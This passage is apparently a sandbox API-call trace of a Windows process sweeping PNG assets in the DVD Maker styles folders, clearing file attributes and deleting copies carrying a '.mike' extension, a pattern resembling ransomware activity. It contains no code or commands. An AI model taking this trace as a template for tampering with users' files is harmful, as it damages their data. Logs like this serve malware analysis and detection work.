lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.612] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png", dwFileAttributes=0x80) returned 0 [0055.613] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\mainimage-mask.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\mainimage-mask.png.mike")) returned 1 [0055.614] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.618] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png", dwFileAttributes=0x80) returned 0 [0055.619] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\notes-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\notes-static.png.mike")) returned 1 [0055.620] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.625] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png", dwFileAttributes=0x80) returned 0 [0055.625] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\play-static.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\play-static.png.mike")) returned 1 [0055.626] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0055.626] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.626] CoTaskMemFree (pv=0x4e1c10) [0055.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.634] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.638] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0055.638] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\1047x576black.png.mike")) returned 1 [0055.640] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.646] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png", dwFileAttributes=0x80) returned 0 [0055.646] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\203x8subpicture.png.mike")) returned 1 [0055.647] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.653] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.653] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_buttongraphic.png.mike")) returned 1 [0055.654] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.658] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.658] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0055.660] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.664] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.664] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_buttongraphic.png.mike")) returned 1 [0055.666] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.669] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.670] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_selectionsubpicture.png.mike")) returned 1 [0055.671] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.675] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.675] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_buttongraphic.png.mike")) returned 1 [0055.676] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.680] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.680] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationup_selectionsubpicture.png.mike")) returned 1 [0055.681] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.690] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png", dwFileAttributes=0x80) returned 0 [0055.690] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\pagecurl.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\pagecurl.png.mike")) returned 1 [0055.692] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0055.692] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.692] CoTaskMemFree (pv=0x4e1c10) [0055.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.699] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.703] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0055.704] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\1047x576black.png.mike")) returned 1 [0055.705] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.709] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0055.709] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\15x15dot.png.mike")) returned 1 [0055.718] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.721] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png", dwFileAttributes=0x80) returned 0 [0055.722] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotsdarkoverlay.png.mike")) returned 1 [0055.723] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.727] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png", dwFileAttributes=0x80) returned 0 [0055.727] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotslightoverlay.png.mike")) returned 1 [0055.729] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.734] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png", dwFileAttributes=0x80) returned 0 [0055.735] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\full.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\full.png.mike")) returned 1 [0055.736] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.740] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.741] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_buttongraphic.png.mike")) returned 1 [0055.742] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.746] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.746] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0055.748] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.752] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.752] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_buttongraphic.png.mike")) returned 1 [0055.754] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.758] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.758] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationright_selectionsubpicture.png.mike")) returned 1 [0055.760] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.763] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.764] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_buttongraphic.png.mike")) returned 1 [0055.765] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.770] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.770] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\navigationup_selectionsubpicture.png.mike")) returned 1 [0055.771] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.775] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png", dwFileAttributes=0x80) returned 0 [0055.775] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\pushplaysubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\pushplaysubpicture.png.mike")) returned 1 [0055.776] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0055.776] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.776] CoTaskMemFree (pv=0x4e1c10) [0055.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0055.784] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.788] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png", dwFileAttributes=0x80) returned 0 [0055.788] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\1047x576black.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\1047x576black.png.mike")) returned 1 [0055.790] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.794] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png", dwFileAttributes=0x80) returned 0 [0055.794] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\15x15dot.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\15x15dot.png.mike")) returned 1 [0055.795] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.802] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png", dwFileAttributes=0x80) returned 0 [0055.802] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\colorcycle.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\colorcycle.png.mike")) returned 1 [0055.803] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.814] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png", dwFileAttributes=0x80) returned 0 [0055.814] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\huemainsubpicture2.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\huemainsubpicture2.png.mike")) returned 1 [0055.815] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.819] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.820] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_buttongraphic.png.mike")) returned 1 [0055.821] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.825] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.826] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationLeft_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationleft_selectionsubpicture.png.mike")) returned 1 [0055.827] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.830] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.831] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_buttongraphic.png.mike")) returned 1 [0055.832] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.836] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.836] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationRight_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationright_selectionsubpicture.png.mike")) returned 1 [0055.837] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.841] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0055.841] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_buttongraphic.png.mike")) returned 1 [0055.842] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.848] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png", dwFileAttributes=0x80) returned 0 [0055.848] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\NavigationUp_SelectionSubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\navigationup_selectionsubpicture.png.mike")) returned 1 [0055.849] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0055.853] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png", dwFileAttributes=0x80) returned 0 [0055.853] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\HueCycle\\title_stripe.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\huecycle\\title_stripe.png.mike")) returned 1 [0055.854] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0055.854] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0055.855] CoTaskMemFree (pv=0x4e1c10) [0055.855] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: 